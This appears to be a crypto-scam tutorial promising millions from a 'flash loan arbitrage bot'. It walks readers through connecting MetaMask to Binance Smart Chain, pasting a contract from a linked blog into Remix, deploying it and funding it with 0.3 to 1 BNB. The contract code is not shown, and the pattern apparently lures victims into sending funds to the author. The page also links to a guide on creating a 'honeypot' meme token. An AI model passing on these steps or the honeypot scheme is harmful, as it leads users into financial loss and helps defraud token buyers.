How They Make Millions Using Crypto Arbitrage
Tutorial Step By Step
- To get started, Connect your wallet to the Binance Smart Chain using Metamask: metamask.io and set up the network with the following details:
Network Name: Binance Smart Chain
RPC URL: https://bsc.publicnode.com
Chain ID: 56
Currency Symbol: BNB
🔗 Remix Website: https://remix.ethereum.org
🔗 BOT Arbitrage Script Source Code: https://blockchainlizard.blogspot.com/2024/03/flash-loan-crypto-arbitrage-bot-source_19.html
Download MetaMask: https://metamask.io/download
Access Remix: remix.ethereum.org/
Click on the "contracts" folder and then create "New File". Rename it as you like, i.e: “bot.sol"
Paste Smart Contract in Remix: https://blockchainlizard.blogspot.com/2024/03/flash-loan-crypto-arbitrage-bot-source.html
Move to the "Solidity Compiler" tab, select version "0.6.6" and then "Compile" it
Move to the "Deploy" tab, select "Injected Web 3" environment, and then "Deploy" it. After the transaction is confirmed, it's your own BOT now
Deposit funds (at least 0.3 BNB to prevent negating slippage) to your exact contract/bot address
After your transaction is confirmed, start the bot by clicking the 'start' button. Withdraw anytime by clicking 'withdrawal'
🚨 NOTE: I've received messages from people who didn't fund the contract with enough BNB to cover gas fees and possible burn fees. The bot targets token contracts with a MAX 10% burn fee and anything lower. However, nowadays most tokens come with 2~6% fees. If you fund the contract with 0.1 BNB or less, and the bot targets another token with high burn fees, the contract will waste a lot of gas fees. I recommend funding the contract with at least 0.3 ~ 1 BNB to make sure that won't happen.
Contact me for collaboration or ideas: https://t.me/BlockchainLizard
How To Create Your Honeypot Meme Token: https://blockchainlizard.blogspot.com/2024/03/how-to-create-your-honeypot-meme-token.html